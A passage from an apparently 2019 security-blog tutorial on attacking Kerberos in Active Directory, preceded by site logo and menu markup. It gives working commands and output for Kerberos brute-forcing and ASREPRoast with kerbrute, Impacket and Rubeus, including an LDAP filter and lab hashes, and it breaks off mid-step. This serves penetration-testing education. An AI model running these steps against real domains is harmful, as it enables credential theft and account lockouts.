<path d="M6644.2,1627.35l11.018-23.612h2.8l11.114,23.612h-6.205l-1.446-3.084h-9.669l-1.416,3.084Zm10.046-8.311h4.813l-2.39-5.2Z" transform="translate(-6624.614 -1603.707)"></path>
<path d="M6670.6,1627.35l-3.651-6.266h-3.843v6.266h-6.2v-23.612h9.949a8.668,8.668,0,0,1,5.89,15.05l5.006,8.563Zm-7.494-11.618h3.843a3.384,3.384,0,1,0,0-6.768h-3.843Z" transform="translate(-6609.231 -1603.707)"></path>
<path d="M6667.714,1603.738h6.2v17.378h8.5v6.234h-14.706Z" transform="translate(-6596.142 -1603.707)"></path>
<path d="M6687.5,1603.738a11.806,11.806,0,1,1-11.772,11.837A11.84,11.84,0,0,1,6687.5,1603.738Zm0,6.173a5.635,5.635,0,1,0,5.643,5.633A5.62,5.62,0,0,0,6687.5,1609.911Z" transform="translate(-6586.432 -1603.707)"></path>
<path d="M6711.565,1614.664v.88a11.831,11.831,0,1,1-3.5-8.375l-4.374,4.344a5.649,5.649,0,0,0-3.937-1.574,5.6,5.6,0,1,0,4.566,8.881h-4.566v-4.157Z" transform="translate(-6571.602 -1603.707)"></path>
<path d="M6700.172,1603.738h6.206v23.612h-6.206Z" transform="translate(-6556.839 -1603.707)"></path>
<path d="M6720.646,1611.544a5.513,5.513,0,0,0-3.969-1.541,5.541,5.541,0,1,0,3.969,9.507l4.408,4.345a11.8,11.8,0,1,1-8.377-20.117,11.69,11.69,0,0,1,8.313,3.431Z" transform="translate(-6551.15 -1603.707)"></path>
</g>
<g transform="translate(6674.934 1649.252)" fill="#00bfb3">
<path d="M6642.365,1620.282a2.1,2.1,0,0,0-.175-.449,1.236,1.236,0,0,0-.283-.356,1.286,1.286,0,0,0-.406-.232,1.622,1.622,0,0,0-.542-.084,1.584,1.584,0,0,0-.778.184,1.515,1.515,0,0,0-.533.484,2.216,2.216,0,0,0-.3.692,3.178,3.178,0,0,0,0,1.579,2.178,2.178,0,0,0,.3.69,1.54,1.54,0,0,0,.533.487,1.583,1.583,0,0,0,.778.181,1.373,1.373,0,0,0,.583-.115,1.276,1.276,0,0,0,.436-.316,1.479,1.479,0,0,0,.284-.469,2.233,2.233,0,0,0,.134-.577h.964a2.626,2.626,0,0,1-.219.924,2.247,2.247,0,0,1-.5.723,2.212,2.212,0,0,1-.744.469,2.565,2.565,0,0,1-.938.166,2.656,2.656,0,0,1-1.131-.232,2.443,2.443,0,0,1-.85-.635,2.838,2.838,0,0,1-.532-.942,3.576,3.576,0,0,1,0-2.28,2.815,2.815,0,0,1,.532-.942,2.513,2.513,0,0,1,.85-.639,2.621,2.621,0,0,1,1.131-.237,3.016,3.016,0,0,1,.894.131,2.3,2.3,0,0,1,.735.378,1.923,1.923,0,0,1,.519.606,2.064,2.064,0,0,1,.244.811Z" transform="translate(-6638.26 -1618.356)"></path>
<path d="M6643.567,1621.844l-2.115-3.427h1.145l1.492,2.527,1.469-2.527h1.1l-2.107,3.427v2.211h-.987Z" transform="translate(-6634.394 -1618.282)"></path>
<path d="M6644.83,1618.417h2.741a1.972,1.972,0,0,1,1.217.347,1.4,1.4,0,0,1,.246,1.78,1.339,1.339,0,0,1-.6.471v.015a1.233,1.233,0,0,1,.791.493,1.793,1.793,0,0,1,.149,1.579,1.269,1.269,0,0,1-.369.5,1.93,1.93,0,0,1-.65.332,3.18,3.18,0,0,1-.938.124h-2.591Zm.987,2.359h1.61a.875.875,0,0,0,.592-.2.708.708,0,0,0,.236-.579.728.728,0,0,0-.212-.6.942.942,0,0,0-.616-.175h-1.61Zm0,2.472h1.744a.981.981,0,0,0,.7-.232.859.859,0,0,0,.251-.659.825.825,0,0,0-.251-.644,1,1,0,0,0-.7-.225h-1.744Z" transform="translate(-6630.304 -1618.282)"></path>
<path d="M6648.116,1618.417h4.056v.853H6649.1v1.475h2.845v.807H6649.1v1.65h3.127v.853h-4.111Z" transform="translate(-6626.324 -1618.282)"></path>
<path d="M6651.138,1618.417h2.692a2.083,2.083,0,0,1,1.4.4,1.4,1.4,0,0,1,.464,1.121,1.625,1.625,0,0,1-.117.667,1.472,1.472,0,0,1-.276.425,1.081,1.081,0,0,1-.312.235c-.1.046-.18.079-.225.095v.016a1.027,1.027,0,0,1,.271.08.774.774,0,0,1,.272.2,1.079,1.079,0,0,1,.21.358,1.579,1.579,0,0,1,.083.552,4.936,4.936,0,0,0,.076.9,1.174,1.174,0,0,0,.232.582h-1.06a.968.968,0,0,1-.13-.4c-.014-.146-.02-.288-.02-.425a3.99,3.99,0,0,0-.047-.668,1.145,1.145,0,0,0-.176-.467.716.716,0,0,0-.341-.271,1.525,1.525,0,0,0-.558-.086h-1.453v2.321h-.984Zm.984,2.564h1.619a1.038,1.038,0,0,0,.719-.223.879.879,0,0,0,.245-.676,1.038,1.038,0,0,0-.08-.438.622.622,0,0,0-.216-.263.807.807,0,0,0-.316-.128,2.253,2.253,0,0,0-.367-.031h-1.6Z" transform="translate(-6622.667 -1618.282)"></path>
<path d="M6655.255,1622.249a1.271,1.271,0,0,0,.11.553.993.993,0,0,0,.307.374,1.368,1.368,0,0,0,.455.214,2.234,2.234,0,0,0,.556.066,1.753,1.753,0,0,0,.552-.075,1.1,1.1,0,0,0,.372-.192.713.713,0,0,0,.206-.274.812.812,0,0,0,.063-.312.681.681,0,0,0-.145-.478.866.866,0,0,0-.321-.217,7.121,7.121,0,0,0-.7-.21c-.266-.064-.6-.15-.984-.257a2.137,2.137,0,0,1-.6-.248,1.451,1.451,0,0,1-.382-.345,1.2,1.2,0,0,1-.2-.4,1.582,1.582,0,0,1-.06-.434,1.487,1.487,0,0,1,.176-.738,1.6,1.6,0,0,1,.472-.518,2.031,2.031,0,0,1,.662-.3,2.883,2.883,0,0,1,.75-.1,2.929,2.929,0,0,1,.833.115,2.029,2.029,0,0,1,.688.343,1.654,1.654,0,0,1,.469.564,1.675,1.675,0,0,1,.176.779h-.988a.95.95,0,0,0-.371-.77,1.473,1.473,0,0,0-.847-.226,1.759,1.759,0,0,0-.353.038,1.054,1.054,0,0,0-.331.117.73.73,0,0,0-.251.225.612.612,0,0,0-.1.354.6.6,0,0,0,.187.471,1.218,1.218,0,0,0,.487.257l.247.066c.146.04.308.084.485.13s.354.095.527.139l.366.1a1.627,1.627,0,0,1,.479.239,1.445,1.445,0,0,1,.551.756,1.555,1.555,0,0,1,.067.442,1.594,1.594,0,0,1-.193.809,1.651,1.651,0,0,1-.512.551,2.2,2.2,0,0,1-.718.312,3.515,3.515,0,0,1-.819.1,3.446,3.446,0,0,1-.909-.117,2.153,2.153,0,0,1-.742-.365,1.784,1.784,0,0,1-.5-.625,2.081,2.081,0,0,1-.2-.9Z" transform="translate(-6618.874 -1618.356)"></path>
<path d="M6657.507,1618.417h4.058v.853h-3.07v1.475h2.844v.807h-2.844v1.65h3.127v.853h-4.114Z" transform="translate(-6614.952 -1618.282)"></path>
<path d="M6664.5,1620.282a2,2,0,0,0-.173-.449,1.234,1.234,0,0,0-.691-.588,1.605,1.605,0,0,0-.542-.084,1.567,1.567,0,0,0-.775.184,1.471,1.471,0,0,0-.532.484,2.2,2.2,0,0,0-.306.692,3.24,3.24,0,0,0,0,1.579,2.161,2.161,0,0,0,.306.69,1.5,1.5,0,0,0,.532.487,1.567,1.567,0,0,0,.775.181,1.378,1.378,0,0,0,.584-.115,1.279,1.279,0,0,0,.437-.316,1.51,1.51,0,0,0,.282-.469,2.317,2.317,0,0,0,.136-.577h.964a2.668,2.668,0,0,1-.218.924,2.286,2.286,0,0,1-.5.723,2.184,2.184,0,0,1-.742.469,2.579,2.579,0,0,1-.94.166,2.659,2.659,0,0,1-1.131-.232,2.531,2.531,0,0,1-.851-.635,2.853,2.853,0,0,1-.531-.942,3.576,3.576,0,0,1,0-2.28,2.83,2.83,0,0,1,.531-.942,2.555,2.555,0,0,1,1.981-.876,3,3,0,0,1,.894.131,2.346,2.346,0,0,1,.738.378,1.971,1.971,0,0,1,.518.606,2.08,2.08,0,0,1,.243.811Z" transform="translate(-6611.458 -1618.356)"></path>
<path d="M6663.85,1618.417h.985v3.285a5.487,5.487,0,0,0,.029.575,1.3,1.3,0,0,0,.157.524,1,1,0,0,0,.394.384,1.543,1.543,0,0,0,.748.15,1.514,1.514,0,0,0,.743-.15,1,1,0,0,0,.4-.384,1.346,1.346,0,0,0,.159-.524c.018-.195.026-.387.026-.575v-3.285h.985v3.608a2.475,2.475,0,0,1-.163.946,1.845,1.845,0,0,1-.472.677,1.994,1.994,0,0,1-.729.407,3.46,3.46,0,0,1-1.9,0,1.971,1.971,0,0,1-.73-.407,1.818,1.818,0,0,1-.47-.677,2.455,2.455,0,0,1-.166-.946Z" transform="translate(-6607.271 -1618.282)"></path>
<path d="M6667.228,1618.417h2.692a2.081,2.081,0,0,1,1.4.4,1.4,1.4,0,0,1,.465,1.121,1.625,1.625,0,0,1-.117.667,1.415,1.415,0,0,1-.277.425,1.053,1.053,0,0,1-.311.235c-.105.046-.177.079-.226.095v.016a1.049,1.049,0,0,1,.272.08.792.792,0,0,1,.272.2,1.1,1.1,0,0,1,.209.358,1.6,1.6,0,0,1,.084.552,4.855,4.855,0,0,0,.075.9,1.165,1.165,0,0,0,.231.582h-1.059a.915.915,0,0,1-.13-.4c-.013-.146-.019-.288-.019-.425a4.2,4.2,0,0,0-.048-.668,1.1,1.1,0,0,0-.176-.467.714.714,0,0,0-.342-.271,1.521,1.521,0,0,0-.558-.086h-1.453v2.321h-.985Zm.985,2.564h1.618a1.035,1.035,0,0,0,.719-.223.869.869,0,0,0,.245-.676,1.024,1.024,0,0,0-.079-.438.6.6,0,0,0-.216-.263.79.79,0,0,0-.316-.128,2.238,2.238,0,0,0-.368-.031h-1.6Z" transform="translate(-6603.182 -1618.282)"></path>
<path d="M6670.514,1618.417h.987v5.638h-.987Z" transform="translate(-6599.205 -1618.282)"></path>
<path d="M6672.035,1618.417h4.563v.853H6674.8v4.785h-.986v-4.785h-1.783Z" transform="translate(-6597.361 -1618.282)"></path>
<path d="M6676.989,1621.844l-2.115-3.427h1.145l1.492,2.527,1.469-2.527h1.1l-2.108,3.427v2.211h-.986Z" transform="translate(-6593.923 -1618.282)"></path>
<path d="M6680.015,1618.417h4.061v.853H6681v1.475h2.84v.807H6681v1.65h3.126v.853h-4.115Z" transform="translate(-6587.696 -1618.282)"></path>
<path d="M6682.891,1618.417h1.177l1.279,1.99,1.333-1.99h1.1l-1.862,2.715,2,2.923h-1.2l-1.406-2.156-1.428,2.156h-1.131l2-2.923Z" transform="translate(-6584.381 -1618.282)"></path>
<path d="M6686.122,1618.417h2.486a2.381,2.381,0,0,1,.979.172,1.522,1.522,0,0,1,.583.436,1.447,1.447,0,0,1,.281.568,2.389,2.389,0,0,1,.076.568,2.313,2.313,0,0,1-.076.564,1.473,1.473,0,0,1-.281.566,1.491,1.491,0,0,1-.583.429,2.379,2.379,0,0,1-.979.17h-1.5v2.165h-.986Zm.986,2.668h1.445a1.255,1.255,0,0,0,.34-.048,1,1,0,0,0,.319-.153.78.78,0,0,0,.236-.285.986.986,0,0,0,.092-.447,1.119,1.119,0,0,0-.081-.458.741.741,0,0,0-.211-.287.766.766,0,0,0-.31-.146,1.657,1.657,0,0,0-.371-.04h-1.46Z" transform="translate(-6580.301 -1618.282)"></path>
<path d="M6689.275,1618.417h4.057v.853h-3.069v1.475h2.842v.807h-2.842v1.65h3.126v.853h-4.113Z" transform="translate(-6576.484 -1618.282)"></path>
<path d="M6692.3,1618.417h2.693a2.085,2.085,0,0,1,1.4.4,1.4,1.4,0,0,1,.465,1.121,1.643,1.643,0,0,1-.116.667,1.472,1.472,0,0,1-.276.425,1.084,1.084,0,0,1-.312.235c-.1.046-.179.079-.226.095v.016a1.008,1.008,0,0,1,.272.08.792.792,0,0,1,.272.2,1.112,1.112,0,0,1,.209.358,1.583,1.583,0,0,1,.081.552,5.208,5.208,0,0,0,.076.9,1.2,1.2,0,0,0,.234.582h-1.059a.916.916,0,0,1-.131-.4c-.013-.146-.02-.288-.02-.425a4.21,4.21,0,0,0-.047-.668,1.144,1.144,0,0,0-.174-.467.733.733,0,0,0-.344-.271,1.519,1.519,0,0,0-.557-.086h-1.452v2.321h-.987Zm.987,2.564h1.618a1.034,1.034,0,0,0,.718-.223.873.873,0,0,0,.246-.676,1.039,1.039,0,0,0-.079-.438.624.624,0,0,0-.217-.263.794.794,0,0,0-.317-.128,2.226,2.226,0,0,0-.367-.031h-1.6Z" transform="translate(-6572.827 -1618.282)"></path>
<path d="M6695.275,1618.417h4.563v.853h-1.79v4.785h-.989v-4.785h-1.783Z" transform="translate(-6569.221 -1618.282)"></path>
<path d="M6699.242,1622.249a1.231,1.231,0,0,0,.11.553,1,1,0,0,0,.307.374,1.363,1.363,0,0,0,.454.214,2.236,2.236,0,0,0,.557.066,1.778,1.778,0,0,0,.554-.075,1.112,1.112,0,0,0,.37-.192.7.7,0,0,0,.206-.274.808.808,0,0,0,.061-.312.681.681,0,0,0-.145-.478.837.837,0,0,0-.319-.217,7.121,7.121,0,0,0-.7-.21q-.4-.1-.983-.257a2.1,2.1,0,0,1-.6-.248,1.4,1.4,0,0,1-.383-.345,1.168,1.168,0,0,1-.2-.4,1.659,1.659,0,0,1-.059-.434,1.457,1.457,0,0,1,.178-.738,1.58,1.58,0,0,1,.471-.518,2,2,0,0,1,.661-.3,2.9,2.9,0,0,1,.752-.1,2.927,2.927,0,0,1,.832.115,2.06,2.06,0,0,1,.687.343,1.717,1.717,0,0,1,.471.564,1.7,1.7,0,0,1,.172.779h-.986a.956.956,0,0,0-.371-.77,1.469,1.469,0,0,0-.844-.226,1.814,1.814,0,0,0-.357.038,1.048,1.048,0,0,0-.33.117.733.733,0,0,0-.249.225.6.6,0,0,0-.1.354.607.607,0,0,0,.187.471,1.192,1.192,0,0,0,.487.257l.246.066c.146.04.309.084.486.13l.524.139c.173.044.293.078.368.1a1.681,1.681,0,0,1,.482.239,1.562,1.562,0,0,1,.344.343,1.466,1.466,0,0,1,.271.856,1.614,1.614,0,0,1-.193.809,1.673,1.673,0,0,1-.509.551,2.253,2.253,0,0,1-.72.312,3.533,3.533,0,0,1-.819.1,3.419,3.419,0,0,1-.909-.117,2.146,2.146,0,0,1-.744-.365,1.842,1.842,0,0,1-.506-.625,2.153,2.153,0,0,1-.2-.9Z" transform="translate(-6565.614 -1618.356)"></path>
</g>
</g>
</svg>
</a>
<button id="menu__hamburger" class="menu__hamburger" role="button">
<svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 25 25">
<g id="Grupo_2152" data-name="Grupo 2152" transform="translate(-2130 -48)">
<rect id="Rectángulo_284" data-name="Rectángulo 284" width="25" height="25" transform="translate(2130 48)" fill="none" />
<path id="Icon_material-menu" data-name="Icon material-menu" d="M4.5,25.667h25V22.889H4.5Zm0-6.944h25V15.944H4.5ZM4.5,9v2.778h25V9Z" transform="translate(2125.5 43)" fill="#666" />
</g>
</svg>
</button>
<nav id="menu" class="menu">
<ul class="main_menu"><li id="menu-item-22163" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-22163"><a href="/">Home</a></li><li id="menu-item-20092" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20092"><a href="https://www.tarlogic.com/cybersecurity/">Cybersecurity</a></li><li id="menu-item-20630" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20630"><a href="https://www.tarlogic.com/blackarrow/">BlackArrow</a></li><li id="menu-item-20629" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20629"><a href="https://www.tarlogic.com/cyber-intelligence/">Cyber Intelligence</a></li><li id="menu-item-22164" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-22164"><a title="Cybersecurity Blog" href="https://www.tarlogic.com/cybersecurity-blog/">Blog</a><ul class="sub-menu"><li id="menu-item-22165" class="icon_menu_security menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-22165"><a href="https://www.tarlogic.com/blog/category/cybersecurity/">Cybersecurity blog</a></li><li id="menu-item-22166" class="ba_menu_arrow menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-22166"><a href="https://www.tarlogic.com/blog/category/blackarrow-blog/">BlackArrow blog</a></li><li id="menu-item-22167" class="icon_menu_intel menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22167"><a href="https://www.tarlogic.com/blog/category/cyberintelligence-blog/">Cyber intelligence blog</a></li><li id="menu-item-22168" class="icon_menu_ciber_for_all menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22168"><a href="https://www.tarlogic.com/blog/category/cyber-for-all/">Cyber for all blog</a></li></ul></li><li id="menu-item-22169" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22169"><a title="Contactar con tarlogic" href="https://www.tarlogic.com/contact/">Contact</a></li></ul> </nav>
</div>
</div>
</div>
</header>
<main role="main"><link data-minify="1" rel='stylesheet' id='section-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/3_layouts/section-79084bcded0996de0a07c800a12ed640.css' type='text/css' media='all' />
<link data-minify="1" rel='stylesheet' id='tar-post-styles-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/3_layouts/single_post-9b4328aefcf3c499411642ff3715569f.css' type='text/css' media='all' />
<img width="1920" height="150" data-srcset="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/blog-tarlogic-banner-post_s.jpg 900w,
              https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/blog-tarlogic-banner-post_m.jpg 1200w,
              https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/blog-tarlogic-banner-post_l.jpg 1920w" sizes="(min-width: 75rem) 1920w,
             (min-width: 56.25rem) 1200w,
             900w" src="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/blog-tarlogic-banner-post_blur.jpg" data-src="https://www.tarlogic.com/wp-content/themes/Avada-Child-Theme/images/blog-tarlogic-banner-post_s.jpg" class="header__background lazyload teaser" alt="">
<section class="section single_post">
<article>
<header class="single_post__header">
<div class="single_post__return">
<a href="https://www.tarlogic.com/cybersecurity-blog/" class="single_post__return_button button">Return to blog</a>
</div>
<div class="single_post__content">
<h1 class="single_post__title">Kerberos (II): How to attack Kerberos?</h1>
<span class="single_post__entry_date__author">
<time datetime="2019-06-04">04 - Jun - 2019</time>
- Eloy Pérez
</span>
</div>
</header>
<div class="single_post__content">
<link data-minify="1" rel='stylesheet' id='post_series_block-css' href='https://www.tarlogic.com/wp-content/cache/min/1/wp-content/themes/Avada-Child-Theme/assets/css/2_components/post_series_block-84200d98ff916b4cad2eb56401aba17d.css' type='text/css' media='all' />
<h2></h2>
<h3>Introduction</h3>
<div>
<div>In this article about Kerberos, a few attacks against the protocol will be shown. In order to refresh the concepts behind the following attacks, it is recommended to check the first part of this series which covers <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</div>
</div>
<div></div>
<div>
<div>
<div>The post is divided in one section per attack:</div>
<ul>
<li>Kerberos brute-force</li>
<li>ASREPRoast</li>
<li>Kerberoasting</li>
<li>Pass the key</li>
<li>Pass the ticket</li>
<li>Silver ticket</li>
<li>Golden ticket</li>
</ul>
</div>
<div>
<div>These attacks are sorted by the privileges needed to perform them, in ascending order. Thus, to perform the first attacks only connectivity with the DC (Domain Controller) is required, which is the KDC (Key Distribution Center) for the AD (Active Directory) network. Whereas, the last attack requires a user being a Domain Administrator or having similar privileges.</div>
<div></div>
</div>
<div>
<div>
<div>Furthermore, each attack will be introduced from the pentesting perspective of 2 common scenarios:</div>
<div>
<div>
<ul>
<li><strong>Linux machine</strong>: A computer external to the domain, owned by the auditor (Kali in this case), but with network connectivity to the DC (directly, VPN, Socks, does not really matter). It must be taken into account that the local time of the machine has to be synchronized with the DC.</li>
<li><strong>Windows machine</strong>: A compromised Windows machine in the domain, with a domain account if needed but with no administrator privileges, neither local nor domain.</li>
</ul>
<div>It is done this way because there are plenty of publications only covering part of one scenario. Therefore, the goal here is to present a useful guide that shows how to perform any attack in many different circumstances. Anyway, a comment can be leaving by anyone if any concept is not completely explained.</div>
</div>
</div>
</div>
</div>
</div>
<h3>Tools</h3>
<div>First of all, throughout this article the following main tools are used:</div>
<ul>
<li>Examples of <a href="https://github.com/SecureAuthCorp/impacket" rel="nofollow">Impacket</a>, to perform Kerberos related Linux attacks, which requires python installed on the machine.</li>
<li><a href="https://github.com/gentilkiwi/mimikatz" rel="nofollow">Mimikatz</a>, for Windows attacks.</li>
<li><a href="https://github.com/GhostPack/Rubeus" rel="nofollow">Rubeus</a>, for Windows attacks, which requires Redistributable 3.5 installed on the machine.</li>
<li><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/psexec" rel="nofollow">PsExec</a>, for executing commands from Windows in remote machines.</li>
</ul>
<div>There are a few additional tools, but those will be introduced in their respective sections. Besides, a <a href="https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a">Kerberos attacks cheatsheet</a> was created to quickly get the commands needed to perform any of these attacks.</div>
<div></div>
<div>Let&#8217;s go with the interesting stuff.</div>
<div>
<h3>Kerberos brute-force</h3>
<div>In first place, due to Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has many advantages over brute-forcing other authentication methods, like the following:</div>
<ul>
<li>No domain account is needed to conduct the attack, just connectivity to the KDC.</li>
<li>Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).</li>
<li>Kerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage in case of performing this sort of technique without knowing any username.</li>
<li>In Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.</li>
</ul>
<div>However, by carrying out a brute-force attack it is also possible to <strong>block user accounts</strong>. Thus, this technique should be used carefully.</div>
</div>
<h4>From Linux</h4>
<p>The script <a href="https://github.com/TarlogicSecurity/kerbrute">kerbrute.py</a> can be used to perform a brute-force attack by using Kerberos from a Linux computer:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b8cad7d7ccf8d3d9d4d1">[email&#160;protected]</a>:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Valid user =&gt; triceratops
[*] Valid user =&gt; velociraptor [NOT PREAUTH]
[*] Valid user =&gt; trex
[*] Blocked/Disabled user =&gt; trex
[*] Stupendous =&gt; velociraptor:Sm4rtSp33d
[*] Saved TGT in velociraptor.ccache
[*] Saved discovered passwords in jurassic_passwords.txt
</code></pre>
<p>Once finished, a file with the discovered passwords is generated. Besides, the obtained TGTs tickets are stored for future use.</p>
<h4>From Windows</h4>
<p>In the case of Windows, the module <em>brute</em> of <a href="https://github.com/Zer1t0/Rubeus" rel="nofollow">Rubeus</a>, which is available on a fork of <a href="https://github.com/Zer1t0/Rubeus" rel="nofollow">Zer1t0</a>, can be used to launch a brute-force attack like the following:</p>
<pre><code class="language-shell">PS C:\Users\user01&gt; .\Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:jurassic.park /outfile:jurassic_passwords.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2

[+] Valid user =&gt; velociraptor
[+] Valid user =&gt; trex
[+] Valid user =&gt; triceratops
[+] STUPENDOUS =&gt; triceratops:Sh4rpH0rns
[*] Saved TGT into triceratops.kirbi
</code></pre>
<p>In the same way as in the Linux scenario, the discovered credentials are saved in the output file alongside valid TGTs.</p>
<h3>ASREPRoast</h3>
<p>The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</p>
<p>Furthermore, no domain account is needed to perform this attack, only connection to the KDC. However, with a domain account, an LDAP query can be used to retrieve users without Kerberos pre-authentication in the domain. Otherwise usernames have to be guessed.</p>
<p>In order to retrieve user accounts without Kerberos pre-authentication, the following LDAP filter can be used: <em>(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))</em> . Parameter <em>samAccountType </em>allows to request user accounts only, without including computer accounts, and <em>userAccountControl </em>filters by Kerberos pre-authentication in this case.</p>
<h4>From Linux</h4>
<p>The script <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py" rel="nofollow">GetNPUsers.py</a> can be used from a Linux machine in order to harvest the non-preauth AS_REP responses. The following commands allow to use a given username list or query to obtain a list of users by providing domain credentials:</p>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="ea9885859eaa818b8683">[email&#160;protected]</a>:impacket-examples# python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[-] User trex doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User triceratops doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="b7c5d8d8c3f7dcd6dbde">[email&#160;protected]</a>:impacket-examples# cat hashes.asreproast 
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4a6e2138287f2b39382f3a6e78796e3c2f26252923382b3a3e25380a001f180b19190309641a0b1801">[email&#160;protected]</a>:7c2e70d3d46b4794b9549bba5c6b728e$599da4e9b7823dbc8432c188c0cf14151df3530601ad57ee0bc2730e0f10d3f1552b3552cee9431cf3f1b119d099d3cead7ea38bc29d5d83074035a2e1d7de5fa17c9925c75aac2717f49baae54958ec289301a1c23ca2ec1c5b5be4a495215d42e9cbb2feb8b7f58fb28151ac6ecb0684c27f14ecc35835aecc3eec1ec3056d831dd518f35103fd970f6d082da0ebaf51775afa8777f783898a1fa2cea7493767024ab3688ec4fe00e3d08a7fb20a32c2abf8bdf66c9c42f49576ae9671400be01b6156b4677be4c79d807ba61f4703d9acda0e66befc5b442660ac638983680ffa3ada7eacabad0841c9aee586
</code></pre>
<pre><code class="language-shell"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="9ceef3f3e8dcf7fdf0f5">[email&#160;protected]</a>:impacket-examples# python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

Name          MemberOf                                       PasswordLastSet      LastLogon            UAC      
------------  ---------------------------------------------  -------------------  -------------------  --------
velociraptor  CN=Domain Admins,CN=Users,DC=jurassic,DC=park  2019-02-27 17:12:12  2019-03-18 11:44:04  0x410200 



<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="81f3eeeef5c1eae0ede8">[email&#160;protected]</a>:impacket-examples# cat hashes.asreproast 
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7e5a150c1c4b1f0d0c1b0e5a4c4d5a081b12111d170c1f0e0a110c3e342b2c3f2d2d373d502e3f2c35">[email&#160;protected]</a>:6602e01d59b4eeba815ab467194a9de4$b13a0e139b1daa46a457b3fa948c22cbbaad75a94c2b37064d757185d171c258e290210339d950b9245de6fa40a335986146a8c71c0b60f633b4c040141460a0a91737670f21caae6261ebde0151c06adceac22bfed84cb8c1f07948fb8e75b8a1d64c768c9e3f3a50d035ec03df643ea185648406b634b6fd673028e6e90ea429f57f9229b00f47f2bba2cdb7297d29b9f97a83d07c89dee7ea673340f64c443a213d5b9bbed969a68ca7a0ea41245b0fa985f64261803488b61821fbaedf43d50ea16075b2379bb354e4001d73dfd19cc8787b4bcd2bd9b542e0e2b1218ee8c16699c134ae5ec587afe0fd1880
</code></pre>
<p>After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.</p>
<h4>From Windows</h4>
<p>Rubeus can be used to carry out this attack from a Windows machine. The following command will generate a file containing AS_REP messages of affected users:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: AS-REP roasting

[*] Using domain controller: Lab-WDC01.jurassic.park (10.200.220.2)
[*] Building AS-REQ (w/o preauth) for: 'jurassic.park\velociraptor'
[*] Connecting to 10.200.220.2:88
[*] Sent 170 bytes
[*] Received 1423 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Users\triceratops\hashes.asreproast

[*] Roasted hashes written to : C:\Users\triceratops\hashes.asreproast

C:\Users\triceratops&gt;type hashes.asreproast
